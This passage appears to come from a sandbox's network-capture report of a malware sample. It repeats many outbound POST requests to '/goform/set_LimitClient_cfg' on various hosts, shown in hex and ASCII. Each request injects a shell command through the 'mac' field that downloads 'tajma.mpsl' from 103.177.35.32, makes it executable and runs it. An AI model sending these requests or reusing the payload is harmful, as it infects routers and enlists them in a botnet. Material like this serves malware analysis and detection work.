                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1945192.168.2.2354928174.105.36.1668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434710026 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1946192.168.2.2360298122.154.119.988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434726954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1947192.168.2.2343762160.24.130.1518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434750080 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1948192.168.2.234634448.192.44.1708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434766054 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1949192.168.2.2343678111.126.231.728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434798956 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1950192.168.2.2360082130.202.204.1318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434814930 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1951192.168.2.2359068131.136.37.2138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434847116 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1952192.168.2.2334486139.198.185.1948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434859991 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1953192.168.2.2350940201.208.235.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434886932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1954192.168.2.234731884.197.253.1588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434900999 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1955192.168.2.235399445.8.69.1348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434926987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1956192.168.2.235861459.144.238.2438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435015917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1957192.168.2.234569472.168.195.688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435041904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1958192.168.2.233780040.68.84.648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435055017 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1959192.168.2.2359904161.193.6.758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435125113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1960192.168.2.233732073.233.119.2398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435141087 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1961192.168.2.2334250153.23.150.1358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435163975 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1962192.168.2.2340556169.207.171.1908080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435255051 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1963192.168.2.235804890.239.3.208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435293913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1964192.168.2.2349538196.29.219.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435336113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1965192.168.2.2339234161.41.208.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435372114 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1966192.168.2.233819480.206.153.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435403109 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1967192.168.2.2337044147.24.28.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435409069 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
